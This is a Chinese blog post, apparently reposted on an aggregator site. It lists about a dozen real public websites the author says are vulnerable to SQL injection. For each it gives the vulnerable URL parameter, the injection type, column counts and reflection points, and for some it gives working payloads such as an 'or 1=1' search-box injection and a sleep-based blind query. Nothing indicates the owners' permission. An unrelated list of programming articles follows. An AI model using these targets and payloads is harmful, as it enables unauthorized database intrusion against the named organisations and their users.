存在sql注入的公网站点

此数据为博主在新手阶段练习sql注入时发现的站点,漏洞可能修复,备注可能错误

url: https://www.uni-1.com.hk/about_en.php?id=2
注入点类型:数值
sql报错回显:无
sql语句执行:[order by] [union]
字段数:14
回显点:12,13,14


url: https://atmos.mora.com.pl/blank.php?id=19088
注入点类型:数值
sql报错回显:无
sql语句执行:顺利
回显点:1,2,3
用户权限:低

https://www.csi-india.org/news/index.php?id=18
注入点类型:数值
sql报错回显:无
sql语句执行:顺利
字段数:8
回显点:3,4,5,6

http://jwsm.cc/blank.php?id=136
注入点类型:num
sql报错回显:无
权限:普通

https://esjindex.org/search.php?id=2
注入点类型:字符 
异常载荷:' 
sql报错回显:存在
字段:22
union联合查询失效
sleep判断失效

http://www.qdbohai.com/project/list.php
注入点类型:搜索框
传参类型:post传参
输出[all]载荷:keywords=aaaa' or 1=1--+

https://www.sunchampion.com/about.php?id=41
注入点类型:数值
传参类型:get
sql报错回显:存在
回显点:存在
sql报错盲注载荷:exreactvalue

url:https://www.zenith.edu.hk/tc/school.php?id=35
注入点:id=35
类型:str
sql报错回显:存在
页面回显:无,页面自动跳转
sql报错盲注载荷:exreactvalue
comment:union非法混合,

url:https://abp.bzh/article.php?id=31347
类型:str
sql报错回显:存在
页面回显:无
注入方式:sleep延时盲注
comment:order by失效,union失效
盲注载荷:' and if((length(database()))=13,sleep(0),sleep(5)) --+

url:https://www.ciritas.ru/faq2.php?id=2
类型:str

url:https://uppo.pt/announce.php?id=136
类型:str
sql报错回显:无
字段数:19
comment:union失效,403

url:https://www.spbigbag.com/news_view.php?id=1
类型:str

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/463126.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

数据结构与算法——Java实现 53.力扣938题——二叉搜索树的范围和

数据结构与算法——Java实现 53.力扣938题——二叉搜索树的范围和

生命的意义 在于活出自我 而不是成为别人眼中的你 —— 24.11.3 938. 二叉搜索树的范围和 给定二叉搜索树的根结点 root,返回值位于范围 [low, high] 之间的所有结点的值的和。 示例 1: 输入:root [10,5,15,3,7,null,18], low 7, high 15 …
阅读更多...
顺德自闭症全托管学校:专业照顾,细心呵护

顺德自闭症全托管学校:专业照顾,细心呵护

在顺德及周边地区,寻找一所能够为自闭症儿童提供专业照顾与细心呵护的全托管学校,是许多家庭的迫切需求。自闭症儿童在社交、语言和行为上所面临的挑战,需要更为专业的教育环境和细致入微的关怀。而位于广州的星贝育园自闭症儿童寄宿制学校&a…
阅读更多...
【react】基础知识点学习

【react】基础知识点学习

1. 创建项目 npm install -g create-react-app npx create-react-app my-app cd my-app npm startindex.js为入口文件,App.js为根组件。 如何将react应用挂载在页面上? 将App组件渲染到id为root的DOM元素中 2. JSX JSX是|avaScript和XML(HTML)的缩写…
阅读更多...
基于 JAVASSM 框架沙县小吃点餐系统

基于 JAVASSM 框架沙县小吃点餐系统

基于 JAVASSM 框架(即 Java Spring Spring MVC MyBatis)开发一个沙县小吃点餐系统。 步骤一:需求分析 明确系统需要实现的功能,比如: 用户注册和登录浏览菜单添加菜品到购物车下单并支付订单管理后台管理&#…
阅读更多...
apt的编译安装(古老通讯)

apt的编译安装(古老通讯)

Ubuntu系统的防火墙关闭: ufw disable 第一步:Ubuntu 安装依赖环境 apt -y install libpcre3-dev zlib1g-dev libssl-dev build-essential 如果出现无法下载则在末尾处假如 --fix missing如下图所示 出现下图则为安装成功 第二步: useradd…
阅读更多...
基于微信小程序的校园失物招领系统的研究与实现(V4.0)

基于微信小程序的校园失物招领系统的研究与实现(V4.0)

博主介绍:✌stormjun、8年大厂程序员经历。全网粉丝15w、csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌ 🍅文末获取源码联系🍅 👇🏻 精彩专栏推荐订阅👇&…
阅读更多...
有向无环图的拓扑排序——CSP-J1真题讲解

有向无环图的拓扑排序——CSP-J1真题讲解

【题目】 考虑一个有向无环图,该图包括4条有向边:(1,2),(1,3),(2,4),和(3,4)。以下哪个选项是这个有向无环图的一个有效的拓扑排序?( ) A. 4, 2, 3, 1 B. 1, 2, 3, 4 C. 1, 2, 4…
阅读更多...
selenium操作已开启的浏览器,方便调试

selenium操作已开启的浏览器,方便调试

一、谷歌浏览器配置: 在所安装的谷歌下面,执行下面命令,打开谷歌浏览器,用来selenium的操作: 注意事项:端口需要不被占用,--user-data-dir"D:\workspace\chrome-data"这个路径需要有…
阅读更多...
DAY75WEB 攻防-验证码安全篇接口滥用识别插件复用绕过宏命令填入滑块类

DAY75WEB 攻防-验证码安全篇接口滥用识别插件复用绕过宏命令填入滑块类

知识点: 1、验证码简单机制-验证码过于简单可爆破 2、验证码重复使用-验证码验证机制可绕过 3、验证码智能识别-验证码图形码被可识别 4、验证码接口调用-验证码触发接口可枚举 图片验证码-识别插件-登录爆破&接口枚举 验证码识别绕过等技术适用于&#x…
阅读更多...
微信小程序生成二维码

微信小程序生成二维码

目前是在开发小程序端 --> 微信小程序。然后接到需求:根据 form 表单填写内容生成二维码(第一版:表单目前需要客户进行自己输入,然后点击生成按钮实时生成二维码,不需要向后端请求,不存如数据库&#xf…
阅读更多...
海的回忆:海滨学院班级记忆录技术实现

海的回忆:海滨学院班级记忆录技术实现

2相关技术 2.1 MYSQL数据库 MySQL是一个真正的多用户、多线程SQL数据库服务器。 是基于SQL的客户/服务器模式的关系数据库管理系统,它的有点有有功能强大、使用简单、管理方便、安全可靠性高、运行速度快、多线程、跨平台性、完全网络化、稳定性等,非常…
阅读更多...
注册页面设计(表单基础)

注册页面设计(表单基础)

HTML表单是网页中用于收集用户输入信息的区域&#xff0c;它包含了一系列交互控件&#xff0c;允许用户输入数据&#xff0c;并将这些数据发送到Web服务器进行处理。以下是HTML表单的基础知识&#xff1a; 一、表单的基本结构 HTML表单由<form>标签定义&#xff0c;表单…
阅读更多...
003-Kotlin界面开发之声明式编程范式

003-Kotlin界面开发之声明式编程范式

概念本源 在界面程序开发中&#xff0c;有两个非常典型的编程范式&#xff1a;命令式编程和声明式编程。命令式编程是指通过编写一系列命令来描述程序的运行逻辑&#xff0c;而声明式编程则是通过编写一系列声明来描述程序的状态。在命令式编程中&#xff0c;程序员需要关心程…
阅读更多...
OPENAI官方prompt文档解析

OPENAI官方prompt文档解析

官方文档地址:https://platform.openai.com/docs/guides/gpt-best-practices 文档中文版来源:OpenAI 官方提示工程指南 [译] | 宝玉的分享 (baoyu.io) 1.写清楚说明 如果prompt给的范围十分模糊或是过于宽泛,那么GPT就会开始猜测您想要的内容,从而导致生成的结果偏离预期. …
阅读更多...
代理IP地址和端口是什么?怎么进行设置?

代理IP地址和端口是什么?怎么进行设置?

保护个人隐私、突破地域限制、提升网络安全性是我们不断追求的目标。而代理IP地址和端口就是一种实现这些目标的重要工具。但是&#xff0c;你可能对它是什么&#xff0c;以及如何设置感到困惑。别担心&#xff0c;本文将为你揭开这些神秘的面纱&#xff0c;让你轻松掌握这项技…
阅读更多...
【uniapp3】分享一个自己写的h5日历组件

【uniapp3】分享一个自己写的h5日历组件

简言 分享一下自己基于uniapp写的日历组件。如果不太满足你的需求&#xff0c;可以自己改造。 日历 实现分析&#xff1a; 页面显示 - 分为顶部显示和日历显示&#xff0c;我这里做了多行和单行显示两种情况&#xff0c;主要是当时看着手机的日历做的&#xff0c;手机上的…
阅读更多...
rhce作业4

rhce作业4

问题&#xff1a; 1.搭建dns服务器能够对自定义的正向或者反向域完成数据解析查询。 2.配置从DNS服务器&#xff0c;对主dns服务器进行数据备份。 配置&#xff1a; 主服务器配置 安装 关闭防火墙 主配置文件定义正反向解析域 正向解析资源记录文件 反向解析记录文件 重启…
阅读更多...
MybatisPlus入门(八)MybatisPlus-DQL编程控制

MybatisPlus入门(八)MybatisPlus-DQL编程控制

一、字段映射与表名映射 数据库表和实体类名称一样自动关联&#xff0c;数据库表和实体类有部分情况不一样。 问题一&#xff1a;表名与编码开发设计不同步&#xff0c;表名和实体类名称不一致。 解决办法&#xff1a; 在模型类上方&#xff0c;使用TableName注解&#xf…
阅读更多...
摩尔斯电码

摩尔斯电码

偏方记忆法 F .._. 滴滴打滴 很费钱 F 费 R ._. 滴打滴 洗发水广告 滴答滴&#xff0c;滴答滴 大家好才是正的好 G 和Q 可以一起记忆有相通点 把G 也看成一个圈&#xff0c;相交的地方一个点&#xff0c;因为圈没满缺一个_ K 和 Y 可以一起记忆 把K躺着看…
阅读更多...
Vue Router进阶详解

Vue Router进阶详解

导航守卫 若依框架登录鉴权详解&#xff08;动态路由&#xff09;_若依鉴权-CSDN博客 完整的导航解析流程 导航被触发&#xff1a; 当用户点击页面中的链接、使用编程式导航&#xff08;如router.push或router.replace&#xff09;或手动输入URL时&#xff0c;导航流程被触发。…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023